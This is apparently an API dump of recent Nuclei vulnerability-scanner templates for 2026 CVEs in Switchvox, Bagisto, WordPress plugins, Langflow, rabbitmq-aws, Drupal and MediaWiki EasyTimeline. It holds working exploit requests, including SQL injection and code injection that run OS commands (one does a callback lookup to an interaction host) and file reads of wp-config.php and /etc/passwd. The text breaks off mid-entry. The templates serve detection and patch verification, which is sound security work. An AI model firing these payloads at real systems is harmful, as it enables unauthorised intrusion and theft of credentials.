{"_links":{"collection":{"href":"/dashboards/nuclei_templates"},"self":{"href":"/api/v1/nuclei_templates/recent_all"}},"data":[{"raw":"id: CVE-2026-9586\n\ninfo:\n  name: Sangoma Switchvox < 8.4.0.2 - Unauthenticated SQL Injection\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Sangoma Switchvox before version 8.4.0.2 contains an unauthenticated SQL injection vulnerability in the /pa endpoint (PhoneAppsHandler.pm). The PhoneIP field extracted from an XML POST body is concatenated directly into an unparameterized PostgreSQL query that runs as a database superuser. An attacker can break out of the single-quoted SQL string context and leverage PostgreSQL COPY TO PROGRAM to execute arbitrary operating system commands without authentication.\n  impact: |\n    An unauthenticated remote attacker can achieve full remote code execution on the Switchvox server by injecting SQL via the PhoneIP XML field, leveraging PostgreSQL superuser privileges to execute arbitrary OS commands via COPY TO PROGRAM.\n  remediation: |\n    Upgrade Sangoma Switchvox to version 8.4.0.2 or later which parameterizes the SQL query and validates the PhoneIP input.\n  reference:\n    - https://horizon3.ai/attack-research/disclosures/cve-2026-9586-sangoma-switchvox-rce/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-9586\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-9586\n    epss-score: 0.11845\n    epss-percentile: 0.95902\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.html:\"switchvox\"\n    fofa-query: body=\"switchvox\"\n    vendor: sangoma\n    product: switchvox\n  tags: cve,cve2026,sangoma,switchvox,sqli,rce,oast,vkev,vuln,kev\n\nhttp:\n  - raw:\n      - |\n        POST /pa HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/xml\n\n        <request><PhoneIP>10.0.0.1'; COPY (SELECT '') TO PROGRAM 'nslookup {{interactsh-url}}'--</PhoneIP><command>tel_notify</command></request>\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: word\n        part: body\n        words:\n          - \"<html><body></body></html>\"\n# digest: 4a0a00473045022039bf204c55acc2c83c89bc4fba3824c761cf34783679c25c49bab72bec33fc4a022100cca576c9e003dd7136616cdc99599ef331b9412d2a99af3ff5909e267dff5b67:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-9586.yaml","vuln_id":"cve-2026-9586"},{"raw":"id: CVE-2026-9506\n\ninfo:\n  name: Bagisto <= 2.4.1 - Unauthenticated Arbitrary File Read\n  author: str4k3r\n  severity: high\n  description: |\n    Bagisto through 2.4.1 is vulnerable to unauthenticated path traversal in the ImageCache controller. The `original` image-cache route (/cache/original/{filename}) passes the user-supplied filename to getImagePath() without any '..' filtering or realpath containment, allowing a remote unauthenticated attacker to read files outside the intended public image directories (upload/images) - for example the application's composer.json, artisan and other source files.\n  impact: |\n    Unauthenticated attackers can read arbitrary sensitive files, potentially exposing confidential information.\n  remediation: Fixed in 2.4.2, which adds realpath() containment and '../' sanitisation.\n  reference:\n    - https://github.com/advisories/GHSA-qhcg-rw5x-vg94\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-9506\n    - https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0292\n    - https://www.ionix.io/threat-center/cve-2026-9506/\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N\n    cvss-score: 8.7\n    cve-id: CVE-2026-9506\n    epss-score: 0.01238\n    epss-percentile: 0.67767\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: webkul\n    product: bagisto\n    shodan-query: http.html:\"Bagisto\"\n    fofa-query: body=\"bagisto\"\n  tags: cve,cve2026,bagisto,webkul,lfi,unauth\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/cache/original/%2e%2e/composer.json\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"name\": \"bagisto/bagisto\"'\n          - 'Bagisto Laravel E-Commerce'\n        condition: or\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100ed79ac76b8e0472f03cf8c4a18daa8967b8ce36dc6caee0546b9530391498a64022100c44a56240750c027f6bce2fba50aadc25d0e7a2a562a7fed66b6048d7d31b90c:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-9506.yaml","vuln_id":"cve-2026-9506"},{"raw":"id: CVE-2026-9290\n\ninfo:\n  name: WP User Manager – User Profile Builder & Membership - Local File Inclusion\n  author: theamanrawat\n  severity: high\n  description: |\n    WP User Manager – User Profile Builder & Membership plugin for WordPress <= 2.9.17 contains a local file inclusion caused by improper handling in the profile template scope function, letting unauthenticated attackers execute arbitrary PHP code, exploit requires ability to upload or control PHP files.\n  impact: |\n    Unauthenticated attackers can execute arbitrary PHP code, bypass access controls, and access sensitive data.\n  remediation: |\n    Update to a version later than 2.9.17 or the latest available version.\n  reference:\n    - https://patchstack.com/database/vulnerability/wordpress-wp-user-manager-user-profile-builder-membership-plugin-2-9-17-unauthenticated-path-traversal-to-local-file-inclusion-vulnerability\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-9290\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-9290\n    epss-score: 0.02502\n    epss-percentile: 0.84011\n    cwe-id: CWE-22\n  metadata:\n    max-request: 2\n    verified: true\n    product: wp-user-manager\n    vendor: wp-developer\n  tags: cve,cve2026,wordpress,wp-plugin,wp-user-manager,lfi,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/wp-user-manager/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"WP User Manager\")'\n          - 'compare_versions(plugin_version, \"<= 2.9.17\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: plugin_version\n        part: body\n        group: 1\n        regex:\n          - '(?i)Stable\\s+tag:\\s*([0-9.]+)'\n        internal: true\n\n  - raw:\n      - |\n        GET /profile/admin/about?tab=../../../../../wp-login HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"wp-login-logo\"\n          - \"Username or Email Address\"\n          - \"wp-login-lost-password\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450221008c11aee580e76b9b08ff0822abe9430861da47e65ae7fab0c7fff552de1c0aef02204c61d59bcd569542c1bcb97a1608b5f1479de83a6ea89ba368d2658b5010a8f8:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-9290.yaml","vuln_id":"cve-2026-9290"},{"raw":"id: CVE-2026-9282\n\ninfo:\n  name: W3 Total Cache <= 2.9.4 - Unauthenticated Arbitrary File Read\n  author: 0x_Akoko\n  severity: high\n  description: |\n   W3 Total Cache WordPress plugin <= 2.9.4 contains a directory traversal caused by improper handling in setupSources function, letting unauthenticated attackers read arbitrary files, exploit requires manual minify mode enabled with specific filename.\n  impact: |\n   Unauthenticated attackers can read arbitrary files, potentially exposing sensitive information on the server.\n  remediation: |\n   Update to the latest version beyond 2.9.4.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e92cc06d-006f-4bba-a4ef-b23d80c00085\n    - https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.9.4/Minify_MinifiedFileRequestHandler.php#L191\n    - https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.9.4/lib/Minify/Minify/Controller/MinApp.php#L108\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-9282\n    epss-score: 0.02861\n    epss-percentile: 0.86156\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: boldgrid\n    product: w3-total-cache\n    fofa-query: body=\"/wp-content/plugins/w3-total-cache/\"\n    shodan-query: http.html:\"w3-total-cache\"\n    tags: cve,cve2026,wordpress,wp-plugin,w3-total-cache,lfi,unauth,disclosure,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"/wp-content/cache/minify/\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: theme_key\n        internal: true\n        part: body\n        group: 1\n        regex:\n          - '/wp-content/cache/minify/([a-f0-9]+)\\.[^./\"]+\\.include(?:-(?:footer|body))?\\.[a-f0-9]+\\.(?:css|js)'\n\n      - type: regex\n        name: template_key\n        internal: true\n        part: body\n        group: 1\n        regex:\n          - '/wp-content/cache/minify/[a-f0-9]+\\.([^./\"]+)\\.include(?:-(?:footer|body))?\\.[a-f0-9]+\\.(?:css|js)'\n\n  - raw:\n      - |\n        GET /?w3tc_minify={{theme_key}}.{{template_key}}.include.{{theme_key}}.css&f_array[]=wp-config.php HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"text/css\")'\n          - 'contains(body, \"DB_PASSWORD\")'\n          - 'contains(body, \"DB_NAME\")'\n        condition: and\n# digest: 4a0a004730450220038ef667f109627ad645baa6b03969f5e06719dbd3d27b37f306d7d259b1fa12022100e7638f2d363aa8e8d749bc5fc0fa4d6551a60ca24403f05541cae78736c24023:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-9282.yaml","vuln_id":"cve-2026-9282"},{"raw":"id: CVE-2026-9198\n\ninfo:\n  name: IBM Langflow - Remote Code Execution\n  author: YesWeHack\n  severity: critical\n  description: |\n    IBM Langflow OSS 1.0.0 through 1.10.0 contains a remote code execution caused by chaining /api/v1/auto_login and /api/v1/validate/code endpoints, letting unauthenticated attackers execute arbitrary code remotely, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can execute arbitrary code remotely, leading to full system compromise.\n  remediation: |\n    Update to the latest version beyond 1.10.0.\n  reference:\n    - https://www.ibm.com/support/pages/node/7278927\n    - https://github.com/ywh-jfellus/CVE-2026-9198\n    - https://github.com/0xdak/CVE-2026-9198_exploit\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-9198\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-9198\n    epss-score: 0.60597\n    epss-percentile: 0.99105\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: ibm\n    product: langflow\n    fofa-query: title=\"Langflow\" || body=\"langflow\"\n  tags: cve,cve2026,langflow,ibm,rce,auth-bypass,vuln,kev,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/auto_login\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"access_token\", \"refresh_token\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: json\n        name: token\n        json:\n          - \".access_token\"\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/validate/code HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Content-Type: application/json\n\n        {\"code\": \"def _nuclei_scan(_=exec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"id\\\", shell=True, stderr=__import__(\\\"subprocess\\\").STDOUT).decode())')):\\n    pass\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'regex(\"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)\", body)'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a0046304402205bf2531662d32326f3292d8ed19d71a64f563595bece19ee632184f6ad3ade9402205faaccbf6f118c82b432cb27db447b92bb4250c2e7956fd4067c7196d1c9d02e:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-9198.yaml","vuln_id":"cve-2026-9198"},{"raw":"id: CVE-2026-9133\n\ninfo:\n  name: Amazon rabbitmq-aws 0.1.0 through 0.2.0 - Arbitrary File Read\n  author: ye11oc4t\n  severity: high\n  description: |\n    Amazon rabbitmq-aws versions 0.1.0 through 0.2.0 contain active debug code in the ARN resolver. An authenticated RabbitMQ user with management API access can submit an arn:aws-debug:file ARN to the validation endpoint and read arbitrary files accessible to the RabbitMQ process.\n  impact: |\n    Authenticated attackers can disclose sensitive configuration files, passwords, TLS private keys, and other secrets readable by the RabbitMQ process.\n  remediation: |\n    Upgrade rabbitmq-aws to version 0.2.1 or later. If upgrading is not immediately possible, disable the aws plugin and rotate secrets stored in files that the RabbitMQ process could read.\n  reference:\n    - https://github.com/amazon-mq/rabbitmq-aws/security/advisories/GHSA-8554-wg4r-7hxm\n    - https://aws.amazon.com/security/security-bulletins/2026-034-aws/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-9133\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 7.7\n    cve-id: CVE-2026-9133\n    epss-score: 0.01039\n    epss-percentile: 0.62488\n    cwe-id: CWE-489\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: amazon\n    product: rabbitmq-aws\n  tags: cve,cve2026,amazon,rabbitmq,aws,lfi,authenticated\n\nvariables:\n  username: \"{{username}}\"\n  password: \"{{password}}\"\n  credentials: \"{{ username + ':' + password }}\"\n\nhttp:\n  - raw:\n      - |\n        PUT /api/aws/arn/validate HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Basic {{base64(credentials)}}\n\n        {\"arns\":[\"arn:aws-debug:file:::/etc/passwd\"]}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"arn:aws-debug:file:::/etc/passwd\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'regex(\"root:[x*]:0:0:\", body)'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a00473045022100a7cfbd0e9517d9137ee3968977271d6f18d59c79457d26d011a1057ec85d52a70220316a93976ecbcad1ef82096de20de653abdaf3fd6fe693f2914fd5da2d7cfaaa:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-9133.yaml","vuln_id":"cve-2026-9133"},{"raw":"id: CVE-2026-9103\n\ninfo:\n  name: Langflow OSS - Superuser Token Issuance\n  author: str4k3r\n  severity: critical\n  description: |\n    Langflow OSS with default AUTO_LOGIN exposes `/api/v1/auto_login`, which returns a superuser access token to any unauthenticated request.\n  impact: |\n    An unauthenticated attacker obtains a superuser access token, granting full control of the Langflow instance including flow creation and execution, which typically leads to remote code execution and access to connected credentials and data sources.\n  remediation: |\n    Disable AUTO_LOGIN by setting `LANGFLOW_AUTO_LOGIN=false`, configure strong superuser credentials, upgrade to a fixed Langflow release, and restrict network exposure of the management interface.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-9103\n    - https://github.com/langflow-ai/langflow\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-9103\n    epss-score: 0.02828\n    epss-percentile: 0.85998\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: langflow-ai\n    product: langflow\n    framework: fastapi\n    shodan-query: http.title:\"Langflow\"\n    fofa-query: title=\"Langflow\"\n    google-query: intitle:\"Langflow\"\n  tags: cve,cve2026,langflow,langflow-ai,auth-bypass\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/auto_login\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - '\"access_token\"\\s*:\\s*\"[^\"\\r\\n]+\"'\n          - '\"refresh_token\"\\s*:\\s*null'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - '\"access_token\"\\s*:\\s*\"([^\"\\r\\n]+)\"'\n# digest: 4a0a00473045022100cc7da72742e0bd3a2f9c2f00d1d212ca218e36522b6e03f99fe238f34e3b97f6022076bd215d95836b7ee997822df422a3565cd2d78cf8f3be973ad693267e47f322:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-9103.yaml","vuln_id":"cve-2026-9103"},{"raw":"id: CVE-2026-9082\n\ninfo:\n  name: Drupal Core - Anonymous SQL Injection via PostgreSQL Entity Query\n  author: slcyber,DhiyaneshDk\n  severity: critical\n  description: |\n    Drupal core from 8.9.0 before 10.4.10, 10.5.0 before 10.5.10, 10.6.0 before 10.6.9, 11.0.0 before 11.1.10, 11.2.0 before 11.2.12, and 11.3.0 before 11.3.10 contains an SQL injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.\n  impact: |\n    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, modification, or full database compromise.\n  remediation: |\n    Upgrade to versions 10.4.10, 10.5.10, 10.6.9, 11.1.10, 11.2.12, 11.3.10 or later.\n  reference:\n    - https://www.drupal.org/sa-core-2026-004\n    - https://slcyber.io/research-center/keys-to-the-kingdom-anonymous-sql-injection-in-drupal-core-cve-2026-9082/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-9082\n    epss-score: 0.89986\n    epss-percentile: 0.99788\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 3\n    shodan-query: http.component:\"Drupal\"\n    fofa-query: app=\"drupal\"\n    product: drupal\n    vendor: drupal\n  tags: cve,cve2026,drupal,sqli,postgresql,kev,vkev\n\nflow: |\n  var bundles = [\"article\", \"page\"];\n  var v2 = false;\n  for (var i = 0; i < bundles.length; i++) {\n    set(\"bundle\", bundles[i]);\n    if (http(1)) {\n      v2 = true;\n      break;\n    }\n  }\n\n  var v1 = http(2) && http(3);\n  v2 || v1;\n\nhttp:\n  - raw:\n      - |\n        GET /jsonapi/node/{{bundle}}?filter[t][condition][path]=title&filter[t][condition][operator]=IN&filter[t][condition][value][%60]=x HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/vnd.api+json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 500\n          - contains(body, \"SQLSTATE[HY\")\n        condition: and\n\n  - raw:\n      - |\n        POST /user/login?_format=json HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"name\":{\"0\":\"x\",\"0||1/(SELECT CASE WHEN (1=1) THEN 0 END)\":\"x\"},\"pass\":\"x\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 500\n        internal: true\n\n  - raw:\n      - |\n        POST /user/login?_format=json HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"name\":{\"0\":\"x\",\"0||1/(SELECT CASE WHEN (1=2) THEN 0 END)\":\"x\"},\"pass\":\"x\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 400\n          - contains(body, \"unrecognized\")\n        condition: and\n# digest: 4a0a00473045022100d41f403aa69b377ec700917de9a4b7700d073a2471c38945120fc1fb7d92f4ea02201a66a31d609ae01c5857d60eb88aef1d42087d27bcb46e66e5eb7fa9b937c68b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-9082.yaml","vuln_id":"cve-2026-9082"},{"raw":"id: CVE-2026-89063\n\ninfo:\n  name: Bookly <=28.1 - IDOR Unauthenticated Sensitive Data Access\n  author: 0x_Akoko\n  severity: high\n  description: |\n    Bookly WordPress plugin <= 28.1 contains an insecure direct object reference caused by missing validation on 'conversation_id' parameter, letting unauthenticated attackers read and inject messages into any AI booking conversation, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can read sensitive customer booking data and inject messages into conversations, compromising privacy and data integrity.\n  remediation: |\n    Update to the latest version beyond 28.1.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookly-responsive-appointment-booking-tool/online-scheduling-and-appointment-booking-system-281-insecure-direct-object-reference-to-unauthenticated-sensitive-data-access-and-message-injection-via-conversation-id-parameter\n    - https://www.cve.org/CVERecord?id=CVE-2026-89063\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N\n    cvss-score: 8.2\n    cve-id: CVE-2026-89063\n    cwe-id: CWE-639\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: bookly\n    product: bookly-responsive-appointment-booking-tool\n    shodan-query: 'http.html:\"BooklyL10nGlobal\"'\n    fofa-query: 'body=\"BooklyL10nGlobal\"'\n  tags: cve,cve2026,wordpress,wp-plugin,bookly,idor,unauth\n\nflow: |\n  http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    max-redirects: 3\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"BooklyL10nGlobal\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: csrftoken\n        part: body\n        regex:\n          - '\"csrf_token\"\\s*:\\s*\"([^\"]+)\"'\n        group: 1\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        X-Requested-With: XMLHttpRequest\n        Referer: {{RootURL}}/\n\n        action=bookly_ai_send_message&csrf_token={{csrftoken}}&conversation_id=0&message=hello\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"json\")'\n          - 'contains_all(body, \"conversation_id\", \"last_message_id\")'\n        condition: and\n\n    extractors:\n      - type: dsl\n        dsl:\n          - 'body'\n# digest: 490a0046304402202235b63dedc523788ea74f2492ca6b38b9a24d6286b49b6dcf6832e35ff4102e02201b1fb317247fcd0acc922d122a30a2fd63fc59d0fda6f7de8f0282ea8f16f7aa:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-89063.yaml","vuln_id":"cve-2026-89063"},{"raw":"id: CVE-2026-8857\n\ninfo:\n  name: MediaWiki EasyTimeline - Code Injection RCE\n  author: pdteam\n  severity: high\n  description: |\n    MediaWiki EasyTimeline (Timeline) extension versions before 1.46.0, 1.45.4, 1.44.6, and 1.43.9 contain a code injection vulnerability caused by insufficient neutralization of newlines in TextData text attributes in EasyTimeline.pl / Timeline.php. A crafted <timeline> block can inject ploticus '#proc getdata' and 'command:' directives, which execute via /bin/sh because EasyTimeline invokes ploticus without the -noshell flag. Exploitation requires the ability to submit timeline markup for rendering — low-privileged edit access, or anonymous access on wikis that allow anonymous editing and API use. This template's parse-based check needs API read access; optional username/password inputs can be supplied for private wikis that deny anonymous read.\n  impact: |\n    Attackers who can submit timeline markup can execute arbitrary OS commands in the context of the EasyTimeline/ploticus process, potentially leading to full host compromise where Timeline is not isolated (for example outside a remote shellbox).\n  remediation: |\n    Upgrade the Timeline / EasyTimeline extension to 1.46.0, 1.45.4, 1.44.6, or 1.43.9 (or later). If an upgrade is not immediately possible, disable the EasyTimeline extension, especially when it is not executed in an isolated shellbox.\n  reference:\n    - https://phabricator.wikimedia.org/T426631\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-8857\n    - https://github.com/advisories/GHSA-q6xp-j96f-7vmp\n    - https://www.mail-archive.com/wikitech-l@lists.wikimedia.org/msg97434.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2026-8857\n    cwe-id: CWE-94\n    epss-score: 0.02098\n    epss-percentile: 0.80871\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: mediawiki\n    product: easytimeline\n    shodan-query: http.component:\"MediaWiki\"\n    fofa-query: app=\"MediaWiki\"\n  tags: cve,cve2026,mediawiki,easytimeline,timeline,rce,intrusive,authenticated,vuln\n\nflow: |\n  if (template[\"username\"] && template[\"password\"]) {\n    http(\"login\") && http(\"detect\") && http(\"exploit\")\n  } else {\n    http(\"detect\") && http(\"exploit\")\n  }\n\nhttp:\n  - id: login\n    raw:\n      - |\n        GET /api.php?action=query&meta=tokens&type=login&format=json HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        POST /api.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=login&format=json&lgname={{username}}&lgpassword={{password}}&lgtoken={{url_encode(logintoken)}}\n\n    extractors:\n      - type: json\n        name: logintoken\n        part: body\n        internal: true\n        json:\n          - '.query.tokens.logintoken'\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"result\":\"Success\"'\n        internal: true\n\n  - id: detect\n    raw:\n      - |\n        GET /api.php?action=query&meta=siteinfo&siprop=extensions|general&format=json HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"\\\"generator\\\":\\\"MediaWiki\")'\n          - 'contains(body, \"\\\"name\\\":\\\"EasyTimeline\\\"\")'\n        internal: true\n\n  - id: exploit\n    raw:\n      - |\n        POST /api.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=parse&format=json&contentmodel=wikitext&text=%3Ctimeline%3E%0ADateFormat%3Dyyyy%0AImageSize%3Dwidth%3A200+height%3A100%0APeriod%3Dfrom%3A2000+till%3A2010%0APlotArea%3Dwidth%3A150+height%3A50+left%3A30+bottom%3A30%0ATimeAxis%3Dorientation%3Ahorizontal%0ATextData%3D%0A++pos%3A%2840%2C40%29+fontsize%3AS+text%3A%22x%5Cn%23proc+getdata%5Cncommand%3A+id+%3E+file.err%5Cn{{rand_text_alphanumeric(12)}}%22%0A%3C%2Ftimeline%3E\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'timeline-error'\n      - type: regex\n        part: body\n        regex:\n          - 'uid=\\d+\\([^)]+\\)'\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - '(uid=\\d+\\([^)]+\\)(?:\\s+gid=\\d+\\([^)]+\\))?(?:\\s+groups=[^<\"\\\\]+)?)'\n# digest: 4a0a0047304502203e1282cdfaffc23a994ccb9189392634bebaf8d7cfe02dba9cf3375165a2cac6022100aa0e40740959e45c9dd891b4353727132f6b172ce44789b7d13cd9c02fe48dd2:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-8857.yaml","vuln_id":"cve-2026-8857"},{"raw":"id: CVE-2026-8839\n\ninfo:\n  name: WordPress MapPress Maps <= 2.96.6 - Unauthenticated IDOR\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    MapPress Maps for WordPress <= 2.96.6 contains an authorization bypass caused by missing ownership verification in REST API routes, letting unauthenticated attackers read any map data and authenticated contributors modify any map, exploit requires crafted API requests\n  impact: |\n    Unauthenticated attackers can read sensitive map data; authenticated contributors can modify or delete any map, risking data exposure and unauthorized modifications.\n  remediation: |\n    Update to the latest version beyond 2.96.6.\n  reference:\n    - https://plugins.trac.wordpress.org/browser/mappress-google-maps-for-wordpress/trunk/mappress_api.php\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-8839\n    - https://wordpress.org/plugins/mappress-google-maps-for-wordpress/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-8839\n    epss-score: 0.01018\n    epss-percentile: 0.61867\n    cwe-id: CWE-639\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"wp-content/plugins/mappress-google-maps-for-wordpress\"\n  tags: cve,cve2026,wordpress,wp-plugin,mappress,idor,exposure,wp\n\nhttp:\n  - raw:\n      - |\n        GET /wp-json/mapp/v1/maps/1 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"\\\"mapid\\\"\", \"\\\"pois\\\"\", \"\\\"center\\\"\")'\n        condition: and\n# digest: 4a0a004730450220330b826c4fa5710dac1c064669c309a17d066eacad014ef36ae39a3a09aa682a022100e5ec09b191f80ba208b11bc9fdc7b9c179fc93336cd9a96f0c1721daf0d15110:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-8839.yaml","vuln_id":"cve-2026-8839"},{"raw":"id: CVE-2026-88062\n\ninfo:\n  name: OmniRoute < 3.8.49 - Unauthenticated RCE\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    OmniRoute <= 3.8.49 contains a remote code execution caused by insufficient validation of interpreter arguments in the POST /api/acp/agents endpoint, letting remote attackers execute arbitrary code, exploit requires anonymous access when requireLogin is false or management session/API key when true.\n  impact: |\n    Remote attackers can execute arbitrary code in the server container, potentially leading to full system compromise.\n  remediation: |\n    Update to the latest version once a fix is available.\n  reference:\n    - 